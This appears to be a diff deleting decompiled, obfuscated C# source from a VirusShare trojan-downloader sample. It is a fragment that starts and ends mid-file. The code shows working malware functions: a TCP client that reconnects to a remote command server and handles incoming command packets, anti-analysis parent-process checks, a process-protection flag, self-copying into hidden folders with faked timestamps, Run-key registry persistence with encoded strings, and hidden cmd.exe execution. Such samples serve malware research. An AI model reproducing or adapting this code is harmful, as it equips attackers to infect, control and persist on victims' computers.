|
||||||
{
|
|
||||||
if (this.ࠆ)
|
|
||||||
return;
|
|
||||||
this.Үय़ඕ\u0382\u1BFB\u0E89กఊໞ = new Thread((ThreadStart) (() =>
|
|
||||||
{
|
|
||||||
this.ᶏ݉ࡂᕄ = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
|
|
||||||
while (!this.ᶏ݉ࡂᕄ.Connected)
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
this.ᶏ݉ࡂᕄ.Connect(this.ᅻᮈᗬ, this.ṑ);
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
Thread.Sleep(TimeSpan.FromSeconds((double) ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.\u0D56ၴ));
|
|
||||||
}
|
|
||||||
}
|
|
||||||
this.\u0AF4ᆎᎲፎ();
|
|
||||||
}));
|
|
||||||
this.Үय़ඕ\u0382\u1BFB\u0E89กఊໞ.Start();
|
|
||||||
}
|
|
||||||
|
|
||||||
private void \u0AF4ᆎᎲፎ()
|
|
||||||
{
|
|
||||||
if (this.ࠆ)
|
|
||||||
return;
|
|
||||||
this.ࠆ = true;
|
|
||||||
if (this.ᴒ᳦\u1B4Dఛᢝ\u1AF2ୖḖ == null)
|
|
||||||
return;
|
|
||||||
this.ᴒ᳦\u1B4Dఛᢝ\u1AF2ୖḖ((object) this, (EventArgs) null);
|
|
||||||
}
|
|
||||||
|
|
||||||
public void \u1ACCӴᆊᘗృ()
|
|
||||||
{
|
|
||||||
this.ផᡷᑰ̣\u0FCC = new Thread(new ThreadStart(this.ዹẛႯ\u1B5D่\u02F2));
|
|
||||||
this.ផᡷᑰ̣\u0FCC.Start();
|
|
||||||
}
|
|
||||||
|
|
||||||
private void ዹẛႯ\u1B5D่\u02F2()
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
MemoryStream ms = new MemoryStream();
|
|
||||||
byte[] array;
|
|
||||||
do
|
|
||||||
{
|
|
||||||
array = new byte[this.ᶏ݉ࡂᕄ.ReceiveBufferSize];
|
|
||||||
int num = this.ᶏ݉ࡂᕄ.Receive(array, 0, array.Length, SocketFlags.Partial);
|
|
||||||
if (num <= 0)
|
|
||||||
throw new SocketException();
|
|
||||||
Array.Resize<byte>(ref array, num);
|
|
||||||
ms.Write(array, 0, num);
|
|
||||||
}
|
|
||||||
while (!(char.ConvertFromUtf32((int) array[array.Length - 1]) == "\n"));
|
|
||||||
ms.Close();
|
|
||||||
new Thread((ThreadStart) (() =>
|
|
||||||
{
|
|
||||||
this.\u0899ڷࡐkоរ(ms.ToArray());
|
|
||||||
ms.Dispose();
|
|
||||||
ms = (MemoryStream) null;
|
|
||||||
})).Start();
|
|
||||||
}
|
|
||||||
catch (SocketException ex)
|
|
||||||
{
|
|
||||||
this.Рঃ\u001A\u0482\u0092ሡኍ(true);
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
catch (Exception ex)
|
|
||||||
{
|
|
||||||
this.Рঃ\u001A\u0482\u0092ሡኍ(true);
|
|
||||||
Console.WriteLine(ex.Message);
|
|
||||||
}
|
|
||||||
this.ዹẛႯ\u1B5D่\u02F2();
|
|
||||||
}
|
|
||||||
|
|
||||||
private void \u0899ڷࡐkоរ(byte[] ا)
|
|
||||||
{
|
|
||||||
List<byte> byteList = new List<byte>();
|
|
||||||
for (int index = 0; index < ا.Length; ++index)
|
|
||||||
{
|
|
||||||
if (char.ConvertFromUtf32((int) ا[index]) != "\n")
|
|
||||||
{
|
|
||||||
byteList.Add(ا[index]);
|
|
||||||
}
|
|
||||||
else
|
|
||||||
{
|
|
||||||
this.\u0F10Ȃ৪ఉ\u0FC8ᚓϯ(byteList.ToArray());
|
|
||||||
byteList.Clear();
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
private void \u0F10Ȃ৪ఉ\u0FC8ᚓϯ(byte[] டʑᛈ᮲)
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
MemoryStream memoryStream = new MemoryStream(ґ.ᢝҳᔏ\u0C54ᇗᎶᓠয̙(டʑᛈ᮲, true));
|
|
||||||
byte[] buffer = new byte[4];
|
|
||||||
memoryStream.Read(buffer, 0, buffer.Length);
|
|
||||||
\u08F6ᝀ\u08C3.ൠᙣෛ̛\u02E6 int32 = (\u08F6ᝀ\u08C3.ൠᙣෛ̛\u02E6) BitConverter.ToInt32(buffer, 0);
|
|
||||||
byte[] numArray = new byte[memoryStream.Length - 4L];
|
|
||||||
memoryStream.Read(numArray, 0, numArray.Length);
|
|
||||||
memoryStream.Close();
|
|
||||||
memoryStream.Dispose();
|
|
||||||
if (int32 != \u08F6ᝀ\u08C3.ൠᙣෛ̛\u02E6.ᵞະՎ଼ອƝᄸ)
|
|
||||||
{
|
|
||||||
if (this.ᠱव\u1379ᙕግ != null)
|
|
||||||
this.ᠱव\u1379ᙕግ((object) this, new \u16F9ຂ\u0AC6ᶛỠ\u0F3C\u0CDFڂ\u1F1E(numArray, numArray.Length, int32));
|
|
||||||
}
|
|
||||||
else
|
|
||||||
this.\u09FAᕅᎽ\u09D4\u0E60ჷ();
|
|
||||||
டʑᛈ᮲ = (byte[]) null;
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
\u0F28 obj = new \u0F28();
|
|
||||||
obj.Write("Broken Packet");
|
|
||||||
this.ᐫḅӯȉڛ(new \u173AݎᮜఝỼᔩ\u0AFEҊᇅ(\u08F6ᝀ\u08C3.ൠᙣෛ̛\u02E6.ᵂᨭᔵ\u0E63\u1757ᛳቃ័, obj.ݳг̟\u19FBोᨋᖥṈ\u0C64()).\u1A76Ἢཿ());
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
public int ᐫḅӯȉڛ(byte[] _param1)
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
int sent = this.ᶏ݉ࡂᕄ.Send(_param1, 0, _param1.Length, SocketFlags.Partial) + this.ᶏ݉ࡂᕄ.Send(this.\u1CF2ᨁᮕ\u0861ᭉ੪\u02EF, 0, 1, SocketFlags.Partial);
|
|
||||||
if (this.ẇᘇ\u18FB\u0BFBڮ != null && sent != 0)
|
|
||||||
this.ẇᘇ\u18FB\u0BFBڮ((object) this, new Ⴘᨹ\u0B12\u19DAಸŭߊ(sent));
|
|
||||||
return sent;
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
return 0;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
private byte[] \u1CF2ᨁᮕ\u0861ᭉ੪\u02EF => Encoding.ASCII.GetBytes("\n");
|
|
||||||
|
|
||||||
private void \u09FAᕅᎽ\u09D4\u0E60ჷ() => this.ᐫḅӯȉڛ(new \u173AݎᮜఝỼᔩ\u0AFEҊᇅ(\u08F6ᝀ\u08C3.ൠᙣෛ̛\u02E6.ᵞະՎ଼ອƝᄸ, new byte[0]).\u1A76Ἢཿ());
|
|
||||||
|
|
||||||
public void ᙆ\u0097ŏẁᵬ(string _param1)
|
|
||||||
{
|
|
||||||
\u0F28 obj = new \u0F28();
|
|
||||||
obj.Write(_param1);
|
|
||||||
this.ᐫḅӯȉڛ(new \u173AݎᮜఝỼᔩ\u0AFEҊᇅ(\u08F6ᝀ\u08C3.ൠᙣෛ̛\u02E6.ᵂᨭᔵ\u0E63\u1757ᛳቃ័, obj.ݳг̟\u19FBोᨋᖥṈ\u0C64()).\u1A76Ἢཿ());
|
|
||||||
}
|
|
||||||
|
|
||||||
public bool Рঃ\u001A\u0482\u0092ሡኍ(bool זӺᘠȢᢿᑣᧄm)
|
|
||||||
{
|
|
||||||
if (!this.ࠆ)
|
|
||||||
return false;
|
|
||||||
this.ᗏၑᝫ\u139E᭙\u1AA6();
|
|
||||||
this.ࠆ = false;
|
|
||||||
if (זӺᘠȢᢿᑣᧄm && this.ስᨋំදᎦ\u173F\u009F != null)
|
|
||||||
this.ስᨋំදᎦ\u173F\u009F((object) this, (EventArgs) null);
|
|
||||||
return true;
|
|
||||||
}
|
|
||||||
|
|
||||||
public void ᗏၑᝫ\u139E᭙\u1AA6()
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
this.ᶏ݉ࡂᕄ.Close();
|
|
||||||
this.ᶏ݉ࡂᕄ = (Socket) null;
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
}
|
|
||||||
try
|
|
||||||
{
|
|
||||||
this.ផᡷᑰ̣\u0FCC.Abort();
|
|
||||||
this.ផᡷᑰ̣\u0FCC = (Thread) null;
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
public event EventHandler Ǖᔍൎᨧʟ;
|
|
||||||
|
|
||||||
public event EventHandler ၛ\u0FFC\u02C3\u0EA4ᗈ;
|
|
||||||
|
|
||||||
public event EventHandler<Ⴘᨹ\u0B12\u19DAಸŭߊ> \u1716ୄజҘᚻ;
|
|
||||||
|
|
||||||
public event EventHandler<\u16F9ຂ\u0AC6ᶛỠ\u0F3C\u0CDFڂ\u1F1E> ឨҿ\u0C70\u1368ᑉॿ;
|
|
||||||
|
|
||||||
public enum ൠᙣෛ̛\u02E6
|
|
||||||
{
|
|
||||||
ˮۣ\u0FE2௬ = 0,
|
|
||||||
\u003F\u08C9ᐤ\u1AA9ˮ = 1,
|
|
||||||
ᆹñᷭํқත = 2,
|
|
||||||
ώ = 3,
|
|
||||||
ᑾᦓʀೠ = 4,
|
|
||||||
ঀᄫ៩\u0A0Cᜇ\u0EF4\u171Bᤝݸ = 5,
|
|
||||||
ᴛᯍݻѦीؕ = 6,
|
|
||||||
\u1AF9૭ໂၬб\u05EFऻ\u086E = 7,
|
|
||||||
\u1BA4࣮ = 8,
|
|
||||||
ᗐ\u089Bѣ̂ఏ٣ = 9,
|
|
||||||
\u137Dᱧಽ᳞ = 15, // 0x0000000F
|
|
||||||
ဠਘ\u03A2ጹᮾ = 16, // 0x00000010
|
|
||||||
ᢹऴၱࠍزᮝ\u19CD = 17, // 0x00000011
|
|
||||||
\u1B42ᷙ = 18, // 0x00000012
|
|
||||||
ᵞະՎ଼ອƝᄸ = 19, // 0x00000013
|
|
||||||
ฬކყఝᢸᣋ = 20, // 0x00000014
|
|
||||||
ᵂᨭᔵ\u0E63\u1757ᛳቃ័ = 21, // 0x00000015
|
|
||||||
\u1BFB\u1809aỜ = 22, // 0x00000016
|
|
||||||
\u0E61 = 23, // 0x00000017
|
|
||||||
\u19CDਁ\u0CD1ӣ = 24, // 0x00000018
|
|
||||||
Ĕ̗Ų\u087Bᆪ\u00A9ඒၕߒ = 25, // 0x00000019
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,32 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: ᥟޱഁेࠃᵷᣚ.ັᨓීۮἂᐈٙü
|
|
||||||
// Assembly: lgy, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: F6858297-EDCC-46A7-BF64-CBC6BE6B3CD4
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.MSIL.Crypted.ej-8021b1adb21670f837224cd99ccee8599abd7a84c7c3cf7b87df9da753a7739c.exe
|
|
||||||
|
|
||||||
using System.Threading;
|
|
||||||
|
|
||||||
namespace ᥟޱഁेࠃᵷᣚ
|
|
||||||
{
|
|
||||||
internal class \u09B5ັᨓීۮἂᐈٙü
|
|
||||||
{
|
|
||||||
private static Mutex Ṧઌ᳕ᯘᝑ᷑\u0086;
|
|
||||||
|
|
||||||
public static bool \u0831ʛ\u09F3 => !\u09B5ັᨓීۮἂᐈٙü.Ṧઌ᳕ᯘᝑ᷑\u0086.WaitOne(0, false);
|
|
||||||
|
|
||||||
public static void Ѵϛقᶺဌᰨඥ\u02F6(string _param0)
|
|
||||||
{
|
|
||||||
if (\u09B5ັᨓීۮἂᐈٙü.Ṧઌ᳕ᯘᝑ᷑\u0086 != null)
|
|
||||||
return;
|
|
||||||
\u09B5ັᨓීۮἂᐈٙü.Ṧઌ᳕ᯘᝑ᷑\u0086 = new Mutex(false, _param0);
|
|
||||||
}
|
|
||||||
|
|
||||||
public static void \u136EളᆅʤౠṦవܦ()
|
|
||||||
{
|
|
||||||
if (\u09B5ັᨓීۮἂᐈٙü.Ṧઌ᳕ᯘᝑ᷑\u0086 == null)
|
|
||||||
return;
|
|
||||||
\u09B5ັᨓීۮἂᐈٙü.Ṧઌ᳕ᯘᝑ᷑\u0086.Close();
|
|
||||||
\u09B5ັᨓීۮἂᐈٙü.Ṧઌ᳕ᯘᝑ᷑\u0086 = (Mutex) null;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,19 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: ᥟޱഁेࠃᵷᣚ.ณถR̚
|
|
||||||
// Assembly: lgy, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: F6858297-EDCC-46A7-BF64-CBC6BE6B3CD4
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.MSIL.Crypted.ej-8021b1adb21670f837224cd99ccee8599abd7a84c7c3cf7b87df9da753a7739c.exe
|
|
||||||
|
|
||||||
using System;
|
|
||||||
|
|
||||||
namespace ᥟޱഁेࠃᵷᣚ
|
|
||||||
{
|
|
||||||
[Flags]
|
|
||||||
public enum ณถR̚
|
|
||||||
{
|
|
||||||
ᮯḇᘷڨᆶᛇᖋ = 1,
|
|
||||||
ǃ\u1806ᶆ = 2,
|
|
||||||
ů᜔ᣪᇼ = 4,
|
|
||||||
Ἄᑶᇠ = 8,
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,30 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: ᥟޱഁेࠃᵷᣚ.༨
|
|
||||||
// Assembly: lgy, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: F6858297-EDCC-46A7-BF64-CBC6BE6B3CD4
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.MSIL.Crypted.ej-8021b1adb21670f837224cd99ccee8599abd7a84c7c3cf7b87df9da753a7739c.exe
|
|
||||||
|
|
||||||
using System.IO;
|
|
||||||
|
|
||||||
namespace ᥟޱഁेࠃᵷᣚ
|
|
||||||
{
|
|
||||||
internal class \u0F28 : BinaryWriter
|
|
||||||
{
|
|
||||||
private MemoryStream \u177CᕳМنḌ;
|
|
||||||
|
|
||||||
public \u0F28()
|
|
||||||
{
|
|
||||||
this.\u177CᕳМنḌ = new MemoryStream();
|
|
||||||
this.OutStream = (Stream) this.\u177CᕳМنḌ;
|
|
||||||
}
|
|
||||||
|
|
||||||
public byte[] ݳг̟\u19FBोᨋᖥṈ\u0C64()
|
|
||||||
{
|
|
||||||
this.Close();
|
|
||||||
byte[] array = this.\u177CᕳМنḌ.ToArray();
|
|
||||||
this.\u177CᕳМنḌ.Dispose();
|
|
||||||
this.\u177CᕳМنḌ = (MemoryStream) null;
|
|
||||||
return array;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,78 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: ᥟޱഁेࠃᵷᣚ.ူ᳒ؕ
|
|
||||||
// Assembly: lgy, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: F6858297-EDCC-46A7-BF64-CBC6BE6B3CD4
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.MSIL.Crypted.ej-8021b1adb21670f837224cd99ccee8599abd7a84c7c3cf7b87df9da753a7739c.exe
|
|
||||||
|
|
||||||
using System;
|
|
||||||
using System.Diagnostics;
|
|
||||||
using System.IO;
|
|
||||||
using System.Management;
|
|
||||||
|
|
||||||
namespace ᥟޱഁेࠃᵷᣚ
|
|
||||||
{
|
|
||||||
public static class \u1030᳒ؕ
|
|
||||||
{
|
|
||||||
public static void æ()
|
|
||||||
{
|
|
||||||
if (ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.ݝȮ᯳ᴨເ\u17F3)
|
|
||||||
\u1030᳒ؕ.ᇂᵐ();
|
|
||||||
if (ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.\u0D81ᶸጞऒ && !\u1030᳒ؕ.ᄃ\u1366ñྪ্)
|
|
||||||
Process.GetCurrentProcess().Kill();
|
|
||||||
if (!ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.\u0BF7ᕯ\u187Eᠥᮞ\u066B\u0FF2ᶥ)
|
|
||||||
return;
|
|
||||||
\u1030᳒ؕ.\u17F4པྻᰇ\u098DᑪỬ();
|
|
||||||
}
|
|
||||||
|
|
||||||
public static void ᇂᵐ()
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
IntPtr num = ᔂଋᦑ\u0FD4Ỉ\u0F3Dଫ.\u1047ژÚ((string) null);
|
|
||||||
ᔂଋᦑ\u0FD4Ỉ\u0F3Dଫ.ဋཉύᇢ\u1CB8η\u08B5Θե(num, 512U, 4U, out uint _);
|
|
||||||
ᔂଋᦑ\u0FD4Ỉ\u0F3Dଫ.\u0E67ᥟӣۄąŽΤ(num, (IntPtr) 512);
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
public static void \u17F4པྻᰇ\u098DᑪỬ()
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
int num = 1;
|
|
||||||
ᔂଋᦑ\u0FD4Ỉ\u0F3Dଫ.ԩߏ(Process.GetCurrentProcess().Handle, 29, ref num, 4);
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
public static bool ᄃ\u1366ñྪ্
|
|
||||||
{
|
|
||||||
get
|
|
||||||
{
|
|
||||||
using (ManagementObject managementObject = new ManagementObject("win32_process.handle='" + Process.GetCurrentProcess().Id.ToString() + "'"))
|
|
||||||
{
|
|
||||||
managementObject.Get();
|
|
||||||
return !(Process.GetProcessById(Convert.ToInt32(managementObject["ParentProcessId"])).ProcessName.ToLower() != "explorer");
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
public static void ᓍ\u171Aº\u007D\u1A8Dᖽᗢ()
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
string tempFileName = Path.GetTempFileName();
|
|
||||||
File.Delete(tempFileName);
|
|
||||||
string destFileName = tempFileName.Replace(".tmp", ".exe");
|
|
||||||
File.Move(Process.GetCurrentProcess().MainModule.FileName, destFileName);
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,19 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: ᥟޱഁेࠃᵷᣚ.Ⴘᨹ᧚ಸŭߊ
|
|
||||||
// Assembly: lgy, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: F6858297-EDCC-46A7-BF64-CBC6BE6B3CD4
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.MSIL.Crypted.ej-8021b1adb21670f837224cd99ccee8599abd7a84c7c3cf7b87df9da753a7739c.exe
|
|
||||||
|
|
||||||
using System;
|
|
||||||
|
|
||||||
namespace ᥟޱഁेࠃᵷᣚ
|
|
||||||
{
|
|
||||||
internal class Ⴘᨹ\u0B12\u19DAಸŭߊ : EventArgs
|
|
||||||
{
|
|
||||||
private int \u1CC4პ\u104Aᴹ४;
|
|
||||||
|
|
||||||
public Ⴘᨹ\u0B12\u19DAಸŭߊ(int sent) => this.\u1CC4პ\u104Aᴹ४ = sent;
|
|
||||||
|
|
||||||
public int \u06F7Ô\u08D4٩\u0EA4ᛰ\u0EDBᓓ => this.\u1CC4პ\u104Aᴹ४;
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,193 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: ᥟޱഁेࠃᵷᣚ.ዽᓻᏃ܉տ
|
|
||||||
// Assembly: lgy, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: F6858297-EDCC-46A7-BF64-CBC6BE6B3CD4
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.MSIL.Crypted.ej-8021b1adb21670f837224cd99ccee8599abd7a84c7c3cf7b87df9da753a7739c.exe
|
|
||||||
|
|
||||||
using Microsoft.Win32;
|
|
||||||
using System;
|
|
||||||
using System.Diagnostics;
|
|
||||||
using System.IO;
|
|
||||||
|
|
||||||
namespace ᥟޱഁेࠃᵷᣚ
|
|
||||||
{
|
|
||||||
internal class ዽᓻᏃ\u0709տ
|
|
||||||
{
|
|
||||||
public static void ᵭॊ\u0970ୋभḽᛛ()
|
|
||||||
{
|
|
||||||
ዽᓻᏃ\u0709տ.ڥᬕٌ\u05FFᬭҽ\u17DBᭁ();
|
|
||||||
ዽᓻᏃ\u0709տ.ᬢᑊᛘᓜᥱ();
|
|
||||||
ዽᓻᏃ\u0709տ.ԏᠶ\u16FBᶤᐑᄜ();
|
|
||||||
}
|
|
||||||
|
|
||||||
private static void ڥᬕٌ\u05FFᬭҽ\u17DBᭁ()
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
if (!Directory.Exists(ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.ἤუᔴ\u05C3))
|
|
||||||
Directory.CreateDirectory(ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.ἤუᔴ\u05C3);
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
}
|
|
||||||
try
|
|
||||||
{
|
|
||||||
File.Copy(Process.GetCurrentProcess().MainModule.FileName, Path.Combine(ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.ἤუᔴ\u05C3, ґ.ᖢ(ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.ᕽᕅ\u0C73, true)), true);
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
}
|
|
||||||
try
|
|
||||||
{
|
|
||||||
if (ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.\u0093\u08D9ሻჭ)
|
|
||||||
{
|
|
||||||
Random random = new Random();
|
|
||||||
int day = random.Next(1, 28);
|
|
||||||
int month = random.Next(1, 12);
|
|
||||||
int year = random.Next(2000, DateTime.Now.Year);
|
|
||||||
Directory.SetCreationTime(Path.Combine(ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.ἤუᔴ\u05C3, ґ.ᖢ(ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.ᕽᕅ\u0C73, true)), new DateTime(year, month, day));
|
|
||||||
}
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
}
|
|
||||||
if (ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.\u0DEE)
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
File.SetAttributes(ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.ἤუᔴ\u05C3, FileAttributes.Hidden | FileAttributes.NotContentIndexed);
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
||||||
if (!ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.डத\u00A9Ẫ)
|
|
||||||
return;
|
|
||||||
try
|
|
||||||
{
|
|
||||||
File.SetAttributes(Path.Combine(ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.ἤუᔴ\u05C3, ґ.\u07C0ᵯ(ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.ᕽᕅ\u0C73, true)), FileAttributes.Hidden | FileAttributes.NotContentIndexed);
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
public static void ԏᠶ\u16FBᶤᐑᄜ()
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
if (ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.იዡิᣰ\u0E89̗ެ\u1CB0)
|
|
||||||
Registry.CurrentUser.CreateSubKey(ґ.ᖢ("Xnpxf4JsfXBnWHRufXp+enF/Z2J0eQupK6ZveoJ+Z06AfX1weX9hcH1+dHp5Z12AeQ==", true)).SetValue(ґ.ᖢ(ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.ᑫඖᥫϸ\u1AA9\u0E77᧕, true), (object) (ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.ἤუᔴ\u05C3 + "\\" + ґ.ᖢ(ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.ᕽᕅ\u0C73, true)));
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
}
|
|
||||||
try
|
|
||||||
{
|
|
||||||
if (ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.\u1C86ۂƼডಽ)
|
|
||||||
Registry.LocalMachine.CreateSubKey(ґ.ᖢ("Xnpxf4JsfXBnWHRufXp+enF/Z2J0eQupK6ZveoJ+Z06AfX1weX9hcH1+dHp5Z12AeQ==", true)).SetValue(ґ.ᖢ(ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.ᑫඖᥫϸ\u1AA9\u0E77᧕, true), (object) (ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.ἤუᔴ\u05C3 + "\\" + ґ.ᖢ(ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.ᕽᕅ\u0C73, true)));
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
}
|
|
||||||
try
|
|
||||||
{
|
|
||||||
if (!ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.ầ\u05F4)
|
|
||||||
return;
|
|
||||||
RegistryKey subKey = Registry.LocalMachine.CreateSubKey(ґ.ᖢ("XlpRX2JMXVBnWHRufXp+enF/Z0xuf3SBcCsLqSumXnB/gHtnVHl+f2x3d3BvK056eHt6eXB5f35n", true) + ґ.ᖢ(ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.މᆻƑሣū\u0011ሥыᯪ, true));
|
|
||||||
subKey.SetValue("Xn+AbQupK6ZbbH9z", (object) (ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.ἤუᔴ\u05C3 + "\\" + ґ.ᖢ(ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.ᕽᕅ\u0C73, true)));
|
|
||||||
subKey.SetValue("VH5UeX4LqSumf2x3d3Bv", (object) 1, RegistryValueKind.DWord);
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
private static void ᬢᑊᛘᓜᥱ()
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
Process process = new Process();
|
|
||||||
process.StartInfo = new ProcessStartInfo()
|
|
||||||
{
|
|
||||||
FileName = "cmd.exe",
|
|
||||||
UseShellExecute = false,
|
|
||||||
RedirectStandardInput = true,
|
|
||||||
CreateNoWindow = true,
|
|
||||||
WindowStyle = ProcessWindowStyle.Hidden
|
|
||||||
};
|
|
||||||
process.Start();
|
|
||||||
StreamWriter standardInput = process.StandardInput;
|
|
||||||
standardInput.WriteLine("cd " + ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.ἤუᔴ\u05C3);
|
|
||||||
standardInput.WriteLine(string.Format(ґ.ᖢ("cG5zeitmhXp5cF99bHl+cXB9aGV6eXBUTwupK6YrSCs9K0krhjuIRWVaWVA5dG9weX90cXRwfQ==", true), (object) ґ.ᖢ(ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.ᕽᕅ\u0C73, true)));
|
|
||||||
standardInput.Close();
|
|
||||||
process.Kill();
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
public static void Ĕÿ\u104EᤸᥫἛూ()
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
Registry.CurrentUser.CreateSubKey(ґ.ᖢ("Xnpxf4JsfXBnWHRufXp+enF/Z2J0eQupK6ZveoJ+Z06AfX1weX9hcH1+dHp5Z12AeQ==", true)).DeleteValue(ґ.ᖢ(ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.ᑫඖᥫϸ\u1AA9\u0E77᧕, true));
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
}
|
|
||||||
try
|
|
||||||
{
|
|
||||||
Registry.LocalMachine.CreateSubKey(ґ.ᖢ("Xnpxf4JsfXBnWHRufXp+enF/Z2J0eQupK6ZveoJ+Z06AfX1weX9hcH1+dHp5Z12AeQ==", true)).DeleteValue(ґ.ᖢ(ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.\u1316্ཬ, true));
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
}
|
|
||||||
try
|
|
||||||
{
|
|
||||||
